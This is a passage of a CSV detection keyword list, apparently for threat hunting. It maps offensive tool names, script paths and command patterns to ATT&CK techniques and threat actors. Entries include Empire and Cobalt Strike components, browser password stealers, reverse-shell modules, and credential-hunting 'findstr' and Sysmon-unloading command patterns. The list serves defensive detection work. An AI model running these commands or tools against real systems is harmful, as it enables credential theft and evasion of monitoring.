-*Find-RDPClientConnections*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-ComputerDetails.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*FindSMB2UPTime.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z
-*Findsploit*,offensive_tool_keyword,Findsploit,Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c),T1210 - T1105 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/1N3/Findsploit,1,1,N/A,N/A,10,1493,334,2021-09-27T01:43:24Z,2015-03-16T16:15:55Z
-*findstr *BEGIN CERTIFICATE*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*findstr *confidential*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*findstr *cpassword *\sysvol\*.xml*,greyware_tool_keyword,findstr,linux commands abused by attackers - gpp finder,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*findstr *net use*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*findstr *password*,offensive_tool_keyword,findstr,findstr used to find credentials,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*findstr *vnc.ini*,greyware_tool_keyword,findstr,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - 
Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*findstr /si secret *.docx*,greyware_tool_keyword,findstr,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*findstr lsass*,offensive_tool_keyword,findstr,findstr used to find lsass pid in order to dump lsass process,T1003 - T1057 - T1070 - T1082 - T1552,TA0001 - TA0002 - TA0005 - TA0007 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*findstr.exe Tvndrgaaa*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Findsubdomains*,offensive_tool_keyword,findsubdomains,A subdomains discovery tool that collects all possible subdomains from open 
source internet and validates them through various tools to provide accurate results.,T1590 - T1591 - T1595 - T1596 - T1599,TA0011,N/A,N/A,Information Gathering,https://findsubdomains.com/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Find-TrustedDocuments*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Find-TrustedDocuments.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-TrustedDocuments.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FindUncommonShares.git*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,1,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*FindUncommonShares.p*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 
- T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*FindUncommonShares.py *,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,0,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*FindUncommonShares-main*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,1,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*finduncshar_scan*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Find-UnsafeLogonScriptPermissions.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-UnsafeUNCPermissions -UNCScripts*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z 
-*Find-UnsafeUNCPermissions.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-UserField -SearchField *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-WMILocalAdminAccess*,offensive_tool_keyword,empire,Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FireBuster.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*fireeye*commando*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*FireFart*dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,1,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z -*firefox/FakeUpdate_files/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*firefox_decrypt.py*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*firefox_decrypt-main*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*firefox_extension_bindshell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*firefox_extension_reverse_shell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*firefox_privilege_escalation.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*firefox_privilege_escalation_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*firefox_smil_uaf*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*FireListener.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Firesheep/*,offensive_tool_keyword,firesheep,Free program for HTTP session hijacking attacks.,T1550 - T1555 - T1559 - T1565,TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://codebutler.github.io/firesheep/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Firewall_Walker_BOF*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*fishing_with_hollowing*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*fjoaledfpmneenckfbpdfhkmimnjocfa*,greyware_tool_keyword,NordVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fkasler/cuddlephish*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*Flangvik/NetLoader*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z 
-*Flangvik/SharpExfiltrate*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*flashupdate.ps1*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*florylsk/NtRemoteLoad*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*fltMC* unload SysmonDrv*,offensive_tool_keyword,fltMC,Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective),T1562.006 - T1562.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1,1,0,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*FluxionNetwork*,offensive_tool_keyword,FluxionNetwork,Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. 
Read the FAQ before requesting issues,T1559 - T1189 - T1059 - T1566 - T1056,TA0001 - TA0002 - TA0009,N/A,N/A,Phishing,https://github.com/FluxionNetwork/fluxion,1,1,N/A,N/A,10,4340,1377,2023-08-30T20:11:16Z,2017-04-29T10:22:27Z -*fodhelperbypass*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation 